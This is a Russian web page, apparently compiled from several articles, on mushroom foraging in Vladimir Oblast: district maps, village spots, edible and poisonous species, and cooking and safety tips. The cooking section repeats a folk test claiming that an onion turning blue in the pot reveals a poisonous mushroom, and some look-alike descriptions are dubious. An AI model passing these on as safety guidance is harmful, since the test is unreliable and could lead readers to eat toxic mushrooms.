4 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Грибные места во владимирской области где набрать лукошко

Грибные места во Владимирской области. Где набрать лукошко?

На территории России произрастает около 200 видов грибов, ценнейших питательных продуктов. Так называемая «тихая охота» – не только приятное времяпровождение, наслаждение пением птиц и стрекотом кузнечиков. Это особое искусство. Потребуется немало времени, чтобы научиться отличать, к примеру, зеленушку от серно-желтой рядовки или желчный гриб от белого. А для того чтобы после нескольких часов блуждания между берез и сосен вернуться с полной корзинкой съедобных красавцев, нужно хорошо изучить все грибные места во Владимирской области.

Как правильно собирать грибы?

Трубчатые грибы, которые используются в кулинарии вместе с ножкой, советуют аккуратно выкручивать, поворачивая то в одну, то в другую стороны. А для пластинчатых, где в пищу идут только шляпки, рекомендуется запастись острым ножом. Так все грибные места во Владимирской области будут сохранены в целости и сохранности. Не менее важно и то, что при отсутствии этих низших споровых растений определенные породы деревьев не способны нормально развиваться.

Небольшая карта грибных мест Владимирской области, составленная местными жителями

Поселок Сушнево – заветное место для грибников. Правда, серьезная конкуренция в дневные часы нарушает все удовольствие от «тихой охоты». Зато можно набрать много подосиновиков, опят. Встречаются белые. До станции добираются на электричке, дальше в лес – пешком.

В микрорайоне Оргтруд прямо за жилыми домами простирается сосновый лес – грибов здесь немного, но дальше – березовые рощи, где можно разживиться душистыми лисичками. А если не полениться, в глубине под мощными дубами можно отыскать статные белые шляпки. Вокруг — густые заросли малины.

Окрестности поселка Головино богаты рыжиками. Лес начинается сразу за автобусной остановкой «Школа». Достаточно приехать туда на пригородном общественном транспорте — и через несколько часов ваше лукошко будет полно грибов.

В Байгушах невдалеке от жилых домов тянется сосновый бор. Если пройти чуть дальше, можно наткнуться на шикарные полянки с маслятами. Из другого района добираться сюда проще на автобусе «Владимир-Бараки», который ходит регулярно.

Малоизвестные грибные места во Владимирской области

Местечки эти либо не знают, либо недолюбливают из-за вынужденной долгой прогулки пешком. Чтобы попасть в смешанный лес Шепелево, сначала надо пройти поля. Из-за этого заглядывают сюда только местные жители.

Мошокские леса окутаны такими легендами, что и не разобрать сейчас, что вымысел, а что правда. Однако то, что земли здесь плодородные – факт. Разумеется, делиться секретами старожилам деревни невыгодно, а значит, не очень следует слушать их советы. Отправить могут так далеко, что и выбраться шанса не будет. Зато самостоятельно добраться несложно. По Муромской трассе к поселку, далее, следуя указателю, по направлению к деревне Красный Куст. Внимание! Лес – справа, а слева – болото.

Другая карта грибных мест Владимирской области основана на разделении по районам. Самым привлекательные: Вязниковский и Меленковский (оценены работниками лесничеств в 5 баллов), Гороховецкий и Муромский (в 4 соответственно). Больше всего грибов в низинах. Зависит урожай и от переменчивой погоды.

Ядовитые грибы

Наиболее опасные грибы во Владимирской области – это в первую очередь бледная поганка, розовопластинник, лисичка южная, мухомор, сатанинский гриб, паутинник оранжево-красный.

Бледная поганка может иметь колокольчатую и плоскую, с небольшой выпуклостью шляпку диаметром не более 10 см. Цвета чаще всего зеленоватого, буро-желтого, реже – белого. Иногда на шляпке проявляются светлые хлопья. Ножка прямая, высотой около 12 см, полосатое кольцо. Гриб очень ядовит. Ими, к сожалению, леса Владимирской области чрезвычайно богаты. Срок проявления признаков отравления (тошнота, пена изо рта, боли, галлюцинации, бред) – до полусуток.

У паутинника коричневатая гладкая шляпка, немного суховатая. Мякоть ржаво-красных оттенков. Ножка высокая, желтоватая. Известен всем с детства красный мухомор. А вот его тоже несъедобный брат – поганковидный мухомор – успешно маскируется под желтую сыроежку. Нужно быть очень осторожным, чтобы не перепутать.

Правила грибника

И напоследок: главный закон – если в съедобности гриба есть сомнения, брать его нельзя, чтобы не рисковать здоровьем. Специалисты из Роспотребнадзора объясняют участившиеся случаи пищевых отравлений еще и людской неразборчивостью. Не стоит срывать грибы, если рядом имеются скопления мусора, железная или автомобильная дорога. В грибах из-за такого соседства накапливаются тяжелые металлы и другие вредные для организма вещества. Не должны попасть в корзину также и переросшие, потерявшие товарный вид экземпляры.

А чтобы не приходить домой с пустыми руками, рекомендуется не только регулярно ездить в проверенные грибные места. Во Владимирской области еще много сокрытых плодородных уголков.

Сбор грибов во Владимирской области в 2019 году

Любители «тихой охоты» с нетерпением ждут открытия нового сезона и надеются, что грибы Владимирской области в 2019 году, как обычно, порадуют большим количеством и разнообразием. С мая по октябрь леса данной территории наполнены грибами, которые растут в них в изобилии.

Сбор грибов во Владимирской области в 2019 году

Особенности региона

Владимирская область находится на севере России и отличается большим количеством лесных массивов, которые занимают значительную часть ее территории. Другая часть – степные равнины, на которых также можно найти некоторые виды грибов, хотя и в меньшем количестве.

Грибные места в регионе располагаются в южной и восточной его части. Благоприятные погодные условия способствуют активному росту лесных даров и их разнообразию.

Съедобные

Видов съедобных грибов, которые растут во Владимирской области, существует большое количество. Некоторые из них настолько редкие, что занесены в Красную книгу. Владимирской области: 17 видов грибов, из которых 9 являются редкими, 5 – неопределенными по статусу и 3 – восстанавливаемые или восстанавливающие.

В каждом районе преобладают определенные разновидности, поэтому, имея карту грибных мест, любой человек может отправиться в те зоны, где зафиксировано максимальное количество любимых грибов.

Подберезовик

Этот съедобный гриб относят ко 2 категории по пищевой ценности. Он обладает следующим описанием:

  • коричневая или серая шляпка имеет выпуклую форму и достигает в диаметре 5-15 см;
  • ножка высокая, плотная, с заметной чешуйчатостью, белого или сероватого цвета, книзу расширяется.

Одним из видов гриба является подберезовик болотный. Его особенность – мякоть при срезе не темнеет в отличие от обычного подберезовика, а также он не имеет вкуса и запаха. Плодоносят оба вида с июня по октябрь.

Ирина Селютина (Биолог):

По содержанию белка подберезовики удерживают одно из первых мест среди всех съедобных грибов, считаясь самыми вкусными после боровиков. Но это преимущество, не смотря на всю привлекательность и вкус подберезовиков нивелируют следующие факты:

  • в плотном на вид плодовом теле, содержится больше воды, чем в других грибах;
  • они плохо хранятся;
  • в только что принесенных домой грибах через несколько часов уже появляются черви (из отложенных насекомыми яиц вылупляются личинки), да и в природе это – обычное явление. Так происходит потому, что подберезовики характеризуются быстрым темпом роста – в день до 4 см, поэтому полное созревание происходит на 6 день и гриб становится «столовой» для личинок насекомых. Живет он около 10 дней;
  • при сушке и любой другой обработке – чернеют, что очень часто пугает неопытных собирателей и их родственников, считающих, что «грибу кранты» по их вине;
  • во время жарки шляпки могут прилипать к сковороде, формируя непонятную массу.

Собирая подберезовики, помните, что все виды подберезовиков – влаголюбивы, поэтому теплым и влажным летом можно рассчитывать на значительные урожаи их плодовых тел.

Подосиновик

Данные грибы подразделяют на 3 группы в зависимости от оттенка шляпки и времени плодоношения: «колосовики» собирают в июле-июне, «жнивники» – с конца июля по октябрь, «листопадники» – с сентября по ноябрь. Однако их всех объединяют такие характеристики:

  • шляпка крупная, яркая (оранжевая или красноватая), имеет форму полушария, в диаметре достигает 15-30 см, поверхность сухая, бархатистая;
  • ножка высокая (до 20 см), плотная, чешуйчатая, коричневого или черного цвета;
  • пик плодоношения приходится на август-сентябрь.

Опытные грибники знают, что цвет шляпки подосиновика зависит от места обитания, В осинниках без примесей других древесных пород цвет шляпки гриба будет красный или темно-красный, для смешанных лесов характерна оранжевая или желто-красная окраска, в сырых борах – бело-розовая, а в толеповых зарослях – серая.

Маслята

Мелкие или среднего размера грибы, диаметр полушаровидной шляпки у взрослого экземпляра редко достигает больше 15 см. Отличительная черта маслят – тонкая, скользкая и слизистая покровная ткань шляпки. Перед употреблением кожуру необходимо снять – она легко отделяется от плодового тела.

Мякоть сочная и плотная, с едва уловимым характерным для съедобных экземпляров ароматом. В большом количестве встречаются маслята в хвойных лесах.

Согласно народным приметам первые маслята можно собирать в июне – их появление совпадает с началом цветения сосны. Появление второй волны маслюков предвещает цветение липы, а третий начинается в августе и длится вплоть до середины (конца) осени. В это время они перестают расти как только почва начнет промерзать на глубину 2-3 см.

Лисички

Эти деликатесные грибы распространены на всей территории России, включая Владимирскую область. Различают несколько подвидов съедобных лисичек: серая, обыкновенная, бархатистая, трубчатая и др. Всех их объединяют такие характеристики:

  • короткая (до 6-7 см) ножка плавно переходит в конусовидную шляпку; ее диаметр – 3-10 см, у нее загнутые волнистые края;
  • мякоть плотная, мясистая, бело-желтая;
  • хиноманноза, которая содержится в плодовых телах, делает их неуязвимыми перед вредителями, поэтому червивые экземпляры практически не встречаются;
  • большинство подвидов обладает приятным ароматом.

Плодовое тело лисичек напоминает по своему внешнему строению тело привычных нам шляпочных грибов с одним существенным «но» – у представителей семейства Лисичковые шляпка и ножка – единое целое, не имеющее четких границ перехода.

Сыроежки

Сыроежки могут быть ложными

Владимирская область богата разными видами сыроежек. Встречаются среди них и несъедобные экземпляры, поэтому при их сборе следует быть острожными.

У молодых сыроежек шляпка шаровидной формы, по мере их роста она уплощается, в диаметре достигает 15 см. Покровная ткань шляпки бывает разных оттенков: от бурого или оливкового до насыщенно-красного. Мякоть по мере старения гриба становится хрупкой и рассыпчатой.

Отделяется кожица от поверхности шляпки (ее мякоти) по-разному:

  • легко полностью (сыроежка березовая);
  • до половины шляпки (сыроежка солнечная);
  • по краю шляпки (сыроежка золотистая).
  • Способность покровной кожицы отделяться обусловлена некоторыми ее характеристиками, т.к. образована она нитями грибницы (гифами), имеющими в своем клеточном строении пигменты.

Кроме вышеперечисленных видов, в южной части области встречаются белые грибы, сморчки, опята, козляки и т.д.

Также регион богат условно-съедобными экземплярами: белыми и черными груздями, рядовками, рогатиком, поддубовиками и др.

Ядовитые

Особую опасность представляют несъедобные и ядовитые грибы, которые внешне напоминают съедобные экземпляры. Ошибиться при их сборе может даже опытный грибник, поэтому, чтобы не подвергнуть здоровье и жизнь угрозе, во время этого занятия необходимо быть предельно внимательным и осторожным.

Среди опасных двойников, которые наиболее часто встречаются на территории Владимирской области, грибники выделяют следующие названия:

  1. Бледная поганка: ее часто путают с шампиньоном. Основание ножки у нее клубнеобразное, укрыто остатками влагалища, пластинки по мере роста светлеют. Ядовитый гриб не поражается вредителями – насекомые обходят его стороной.
  2. Ложные опята: у них отсутствует характерное белое кольцо на ножке, а пластинки обладают серым или зеленоватым цветом.
  3. Ложная лисичка (говорушка оранжевая): при надломе или срезе мякоти выделяет млечный сок.
  4. Ядовитые двойники сыроежки: на ножке имеется кольцо, а поверхность шляпки часто покрыта бугорками или крапинками.
  5. Желчный гриб: очень похож на подберезовик (подосиновик или белый), обладает горьким вкусом, не исчезающим даже после длительной термической обработки.

Карта грибных мест

Владимирская область состоит из 16 районов, в каждом из которых растет минимум 2 вида грибов. Даже имея карту грибных мест, в лесах нужно вести себя осторожно: в этой зоне обитают опасные дикие животные и змеи, а также там имеются болота.

Согласно составленным ранее грибным картам, во Владимирской области лесные дары следует собирать в определенных районах.

  1. Северная часть: Александровский, Суздальский, Камешковский, Ковровский районы: там встречаются маслята, подосиновики, подберезовики, белые грибы, лисички. Начинающим грибникам найти лесные дары будет сложно – их количество небольшое и грибные места известны только местным жителям, которые их тщательно оберегают.
  2. Гусь-Хрустальный и Меленковский районы Владимира: в этих южных районах можно набрать полные корзины лисичек, белых грибов, маслят и подосиновиков. Плодоношение грибов здесь начинается ранней весной и длится на протяжении всего года, вплоть до первого снега. На «тихую охоту» лучше отправляться после того, как пошли дожди.
  3. Киржачский и Кольчугинский районы: находятся на большом расстоянии от центра (в западных регионах), туда можно поехать за грибами и пополнить запасы подберезовиков и лисичек.
  4. Собинский и Судогодский районы: расположенные в центральной части области, они богаты белыми грибами, подосиновиками и подберезовиками. Учтите! Черта города на грибную карту не наносится – собирать грибы в этой зоне опасно. Даже съедобные экземпляры поглощаютльвиную долю находящихся в воздухе и почве токсических веществ.
  5. Восточные Селивановский, Гороховецкий, Муромский районы: эти места обогатят грибника лисичками и белыми грибами.
  6. Юрьев-Польский и Петушинский районы: нет смысла посещать их для сбора грибов, ведь ситуация там не самая лучшая, особенно для новичков.

Грибники Владимира должны учитывать, что на карте отмечают только места роста съедобных грибов, а вот локализацию условно-съедобных не определяют, хотя их в данной области большое количество.

Где во Владимирской области грибов набрать?

Каждый бывалый грибник с большой неохотой называют «секретные» места, где подберезовики и подосиновики сами просятся в корзину, словно по мановению волшебной дудочки.

Но «Комсомолка» нашла одного из опытных охотников на этих «лесных обитателей» Владимира Акифьева. Он и согласился рассказать, где какой гриб растет.

За лисичками в Мошок, за маслятами в Неклюдово

Самым богатым районом, по словам грибника, оказался Вязниковский район. Здесь можно в большом количестве найти подберезовики, маслята, лисички, подосиновики и самый ценный гриб нашей полосы — белый.

После него идет Собинский район. Тут можно обнаружить подберезовики, подосиновики и белые грибы.

Следующий в рейтинге опытного «охотника» — Меленковский район. И лисички, и подосиновики с подберезовиками здесь водятся в избытке.

Еще один «грибной» район — Селивановский. Больше всего здесь маслят. Бывалые грибники считают, что именно сюда нужно ехать за маслятами, чтобы готовить соленья на зиму. В других районах в таком количестве их не найти.

Если же говорить о конкретных местах, куда можно смело ехать с корзинкой, то тут нужно назвать деревню Мошок в Муромском районе. Лес, что находится рядом с населенным пунктом, славится лисичками и подберезовиками. Еще среди грибников популярны леса под Судогдой. Например, около села Картмазово или села Бараки. Есть хороший лес, богатый самыми разными грибами рядом с селом Рытово, что в Вязниковском районе. Но будьте аккуратны — в лесной чаще просто заблудиться. В саму глубь лучше не заходить. А вот в Неклюдово, что в Гусь-Хрустальном районе много маслят и рыжиков. Других грибов там меньше.

Лучший гриб после Успения

Раскрыл Владимир Акифьев и главный секрет, когда искать самые хорошие за сезон грибы.

— «Успенские» грибы самые коренастые и плотные по структуре. Сейчас, например, в лесах уже можно найти подберезовики, но они с рыхлой ножкой и светло-коричневой шляпкой. А вот после православного праздника Успение (оно по календарю 28 августа) самый разгар обильного роста белых, подосиновик, лисичек, масленок. Считается, что и грибы в этот период самые вкусные. Например, шляпка у тех же подберезовиков будет темно-коричневая, а ножка внутри не волокнистая. Из таких грибов получаются самые хорошие соленья, также их хорошо сушить.

Сейчас же во Владимирских лесах идет период подосиновиков. Расти они будут до первой декады августа. Как отойдут подосиновики, начнется активный рост белых, лисичек, а маслята, волнушки и опята буду расти вплоть до сентября-октября, при условии, что осень будет теплая.

КОНКРЕТНО

Золотые правила грибника

В лес лучше идти спустя 2-3 дня после дождя.

В тенистой глуши грибов меньше, чем на пятачках, освещенных солнцем.

Многие грибы растут семействами, поэтому если нашли один — рядом ищите «собратьев».

Собирать грибы вдоль дорог не стоит — на них оседают все вредные выхлопы. Промывай-не промывай, а всякая дрянь внутри останется.

При сборе грибов лучше всего не кидать в корзину экземпляры, вызывающие сомнение. Уже дома грибы стоит отсортировать по видам.

Срывать грибы нельзя, иначе в этом месте больше никогда не вырастет гриб. А на дно корзины нужно положить ветку с листьями, дабы грибы не высохли. А когда соберетесь домой, то прикройте сверху грибы еще одной веткой.

ВАЖНО

Гриб, как тебя готовить?

Часто встречается заблуждение, что все грибы предварительно нужно варить около получаса. На самом деле у каждого из них свой способ приготовления.

Сморчки и строчки обязательно нужно отварить и тщательно промыть горячей водой. Предварительно у этих грибов отрезают шляпку от ножки, замачивают на час в холодной воде, меняя ее 2-3 раза, а затем уже отваривают в слегка подсоленой воде 10-15 минут. Отвар при этом в пищу не пригоден. Поэтому и супы из сморчков не делают.

А вот из белых грибов готовят бульоны и соусы, они останутся вкусными в соленом и маринованном виде. При любом способе приготовления эти грибы не меняют присущего им цвета и аромата. Стоит отметить, что только бульон из белых и шампиньонов пригодны для приготовления пищи.

Подберезовики и подосиновики для приготовления супов не подойдут, они дают темные отвары с легкой горчинкой. Их жарят, тушат, солят и маринуют.

Грузди и рыжики используют в основном для засолки.

Сыроежки варят, жарят и солят.

Опята жарят. А еще мелкие шляпки этих грибов можно засолить и замариновать.

Маслята можно сушить, варить, мариновать. Жарить и тушить их не следует, так как они выделяют скользкий специфический сок. Предварительно перед готовкой со шляпки гриба нужно снять пленку.

Лисички отлично подходят для жарки. Еще их можно мариновать, но они получаются не упругими. А вот сушить или варить лисички не стоит. Они горчат, а сушеные почти полностью теряют свой вкус.

Черные и белые грузди идеальны для соления, их готовят только этим способом.

И при приготовлении грибов есть свои секреты. Сырые грибы плавают, сваренные — опускаются на дно. А еще во время варки свежих грибов можно положить в воду почищенную луковицу. Если она посинеет, значит, в кастрюле есть ядовитый гриб.

БДИ!

Грибная «опасность»

Несколько советов о том, как не отравиться грибами, дала «Комсомолке» главный специалист-эксперт регионального Управления Роспотребнадзора Марина Борисова:

— Во-первых, нельзя собирать грибы в ведра, полиэтиленовые пакеты или мешки — это приводит к их порче. Также не нужно собирать старые, переросшие, червивые и неизвестные грибы. Пробовать грибы во время сбора тоже плохо — это может привести к отравлению. Готовить «добычу» из леса нужно в тот же день, когда их собрали. Не стоит мариновать и солить грибы в оцинкованной и глиняной глазурованной посуде. И последний совет, которой убережет от отравления — хранить грибы нужно в прохладном месте, а не в тепле.

Виды грибов Владимирской области в 2019

Владимирская область находится в европейской части России. Благодаря хорошему климату и особенностям края, грибы Владимирской области в 2019 году активно плодоносят.

Виды грибов Владимирской области в 2019

Особенности региона

Область расположена на севере страны. Главная особенность региона — обильная лесистость. Леса составляют 50,7% от всей ее территории. Большая часть — смешанные насаждения. В области присутствует равнинная степная местность, поэтому здесь растут и полевые виды.

Грибными считают восток и юг области. На севере лесов мало, поэтому туда редко отправляются на «тихую охоту», но местные жители говорят, что и там находят вкусные грибы.

Съедобные и условно-съедобные грибы

В разных типах насаждений надо искать следующие растения:

  • В старых борах — рыжики.
  • В молодых сосновых насаждениях — маслята.
  • В лиственных лесах — подберезовики, белые грибы, подосиновики, поддубовики, боровики.
  • В смешанных лесах — сыроежки, лисички и моховики.

Реже находят шампиньоны, опята. Вкусными при правильной обработке и засолке считают условно-съедобные виды:

Их несколько дней вымачивают в воде и 15 минут отваривают в кипящей воде. Ранее съедобные свинушки сейчас считают ядовитыми.

Грибы области по временам года

На юге области грибы идут с ранней весны. Собирают сморчки, ранние опята.

С середины июня растут маслята, белые грибы, моховики, опенки, сыроежки. Пика своей мясистости и обильности они достигают с конца августа и до конца сентября. Тогда же собирают подосиновики, маслята, белый боровой, рыжики.

Ядовитые грибы

Ядовитые грибы очень опасны

Самые опасные ядовитые плоды — двойники съедобных видов:

  • Под шампиньоны маскируются бледные поганки.
  • На подберезовик похож желчный гриб.
  • Опасны ложные опята, лисички.
  • Начинающие грибники путают сыроежки с мухомором красным (в случае, если сильные дожди смывают с поверхности шляпки белые хлопья — остатки покрывала).

У поганки ножка расширяется в клубнеподобное основание, а пластинки с возрастом светлеют.

Желчный гриб на сломе розовеет, его никогда не поражают черви, сверху не садятся насекомые.

Ложные опята не имеют кольца на ножке. У них серо-зеленые или серые пластинки. У ядовитой лисички на изломе выделяется млечный сок. Ядовитый двойник сыроежки обладает кольцом на ножке, на его шляпке бывают бугорки или крапинки (не всегда белые).

Часто у условно-съедобных плодов есть опасные разновидности. На белый груздь похож млечник серо-розовый. Опасны ложные валуи (или Хреновый гриб).

Ирина Селютина (Биолог):

Из представителей рода Паутинники наибольшую опасность для человека представляет, пожалуй, валуй ложный, или гебелома клейкая, или как его называют в народе – хреновый гриб. Он очень сильно напоминает по своему виду сыроежки, но радикально отличается от них своим химическим составом. Главным отличительным признаком является резкий запах хрена, который издают только что срезанные плодовые тела. Не стоит ложить его к себе в корзинку, чтобы подробнее изучить дома – через некоторое время запах исчезнет и определить «кто есть кто» будет уже не возможно. Первые признаки отравления проявляются уже через 10 минут после «вкушения» гриба. Развивается сильная жажда переходящая в рвоту, человеку становится сложно дышать Нужно срочно вызывать скорую помощь, а до этого начать промывание желудка.

На сегодняшний день известно, что в плодовом теле гриба имеется две группы сложных по строению токсинов, но какие они сказать сложно. Поэтому говорить об антидотах не приходится. Ученые сходятся в одном:

1 группа токсинов характеризуется курареподобным действием. А это означает, что у пострадавшего может развиться асфиксия и паралич скелетных мышц грудной клетки, ответственных за дыхательные процессы. Затем наступает очередь дыхательного центра в головном мозгу. Он курирует очередность «вдох-выдох» и через 20-30 минут человек погибает.

2 группа токсинов провоцирует паралич нервных клеток, что приводит к потемнению в глазах, сухости в ротовой полости, сильной головной боли и параличу конечностей.

У ядовитых говорушек, в отличие от съедобных, приятный мучнистый запах мякоти.

Карта грибных мест

Всего в области 16 районов. В каждом собирают минимум по 2 вида.

В период сбора следует соблюдать осторожность: во Владимирских лесах есть змеи и дикие животные. Также важно остерегаться болот.

Северные районы

К северным районам причисляют следующие:

  1. Александровский: здесь водятся подберезовики, маслята, подосиновики.
  2. Юрьев-Польский: подберезовики и белые грибы.
  3. Суздальский: белые грибы, подберезовики, лисички, маслята.
  4. Камешковский: маслята и подберезовики.
  5. Ковровский: маслята, подосиновики, подберезовики.

Север не рекомендуют начинающим грибникам. Плодов там мало, и их следует хорошо искать. Чаще туда ходят охотиться местные.

Южные районы

Гусь-Хрустальный и Меленковский пригодны для сбора белого гриба, лисичек, подосиновиков и маслят. Кроме этих видов находят условно-съедобные. В районах мягкий климат, поэтому «охоту» начинают с ранней весны и продолжают вплоть до первого снега. Эти места популярные среди грибников в осенний сезон.

Запад

Западные районы отдалены от центра. Оттуда привозят лисички и подберезовики. Их собирают в Киржачском, Петушинском, Кольчугинском районах.

Центральные районы

В Собинском и Судогодском районах обильно растут белые грибочки, подосиновики и подберезовики.

Помните! Сбор не проводят в черте города, поэтому данную местность не наносят на грибную карту. Даже съедобные плодовые тела тут будут токсичными.

Грибные места Владимирской области 2019

Европейская часть России всегда радовала своих жителей богатым урожаем. Вот и 2019 год не стал исключением из правил! Грибы Владимирской области уже во всю плодоносят в лиственных, смешанных и хвойных лесах, так и зазывая на охоту грибников. И если в этом сезоне наши читатели еще не видели съедобных грибов, растущих на лесных полянках, — самое время отправиться с корзинами на прогулку. Рыжики, подберезовики и сыроежки, наверняка окажутся в лесной чаще!

Реальные отзывы + фото

Просмотрев все отзывы в социальных сетях, можно сделать вывод, что урожай во Владимирской области невероятен в 2019 году. Грибники выкладывают фото лисичек, маслят, горкушек и груздей, подосиновиков и польских грибов, собранных в одной корзине. Некоторые охотники даже умудряются забить багажник машины до отвала, чтобы другим не досталось. Однако, грибы продолжают расти, ожидая новых гостей, которые оценят их вкус и пленящий аромат.

Хотите поиграть в прятки?! Тогда добро пожаловать в лесную чащу, где грибы маскируются лучше десантников в высокой траве, желтой листве и даже под землей. Чтобы найти хотя бы один гриб, надо иметь хорошее зрение или по-крайней мере интуицию, которая подскажет, где искать.

Владимирская область и грибы, в чем связь?

Прежде чем называть Владимирскую область — излюбленным местом грибников, стоит узнать о нескольких особенностях региона.

Во-первых, большая часть — это смешанные деревья. Поэтому лучше вести охоту на грибы, растущие рядом с лиственными деревьями.

Во-вторых, встречается на территории и степная часть. Для любителей гулять по полю, найти грибы прорастающие в высокой траве проблемой не будет.

В-третьи, чтобы найти больше грибных полянок, следует воспользоваться компасом. На север и запад ехать не стоит! Профессионалы и любители знают наверняка, что хороший урожай можно набрать только на юге и востоке.

Съедобные грибы и условно-съедобные

В список самых распространенных грибов съедобного типа можно отнести:

Гораздо реже во Владимирской области находят шампиньоны и опята, так популярные в Липецке и Воронежской области. Зато условно-съедобных грибов в европейской части России в разы больше. Скрипицы, гриб с серьезным названием «Валуй», волнушки и горкушки, — малая доля того, что можно употреблять в пищу после долгого вымачивания. Как и грузди, эти грибы нуждаются в тщательной обработке.

По времени года

Грибы Владимирской области 2019 можно выделить по времени года и даже месяцам. Весной выделяются опята, сморчки и строчки. Лето радует грибников боровиками, маслятами со слизистой шляпкой, летними опятами и сыроежками. С конца лета и до середины октября грибники находят: рыжики, маслята и боровики.

Ядовитые грибы — опасно!

Помимо съедобных плодов, Владимир богат и ядовитыми грибами, которые могут вызвать сильное отравление, интоксикацию организма и даже привести к летальному исходу. Речь идет о бледной поганке, часто попадающей к грибному урожаю случайно, а так же ложным опятам, яркому мухомору с красной шапкой, желчному грибу и лисичкам.

К примеру, распространены случаи отравления сыроежками и рядовками. Многие новички путают их с шампиньонами, забывая об основных признаках семейства агариковых. Поэтому, чтобы не ошибиться, стоит более внимательно подходить к процессу ознакомления с грибами. Лучше всего, если опытный грибник будет рядом!

Карта грибных мест

В 2019 году во Владимирской области опытные грибники выделяют 10 мест, которые стоит посетить любому грибнику, решившему приготовить заготовку на зиму заранее. В списке следующие районы и поселки:

  • Александровский;
  • Суздальский;
  • Ковроский;
  • Гусь-Хрустальный;
  • Петушинский;
  • Меленковский;
  • Юрьев-Польский;
  • Шепелево;
  • Сушнево;
  • Собинский.

На территории этих мест можно найти самые вкусные и ароматные грибы, известные даже новичкам по одному названию. Один белый гриб чего стоит! Даже школьники могут рассказать о его пользе для организма и отличительных чертах, по которым легко отличить съедобный плод от ядовитого.

На фото ниже можно увидеть позаимствованные отчеты грибников из социальных сетей. Реальные фотографии доказывают еще раз, что без грибов никто не ушел! Полные ведерки опят и маслят, ценных боровиков и условно-съедобных грибов, не могут остаться без внимания.

Какие из грибов собрать сегодня, решать только нашим читателям! Надеемся, что наша карта поможет в достижение успеха и поможет найти не одну поляну больших и мясистых грибов, больших и ровных, как на подбор.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
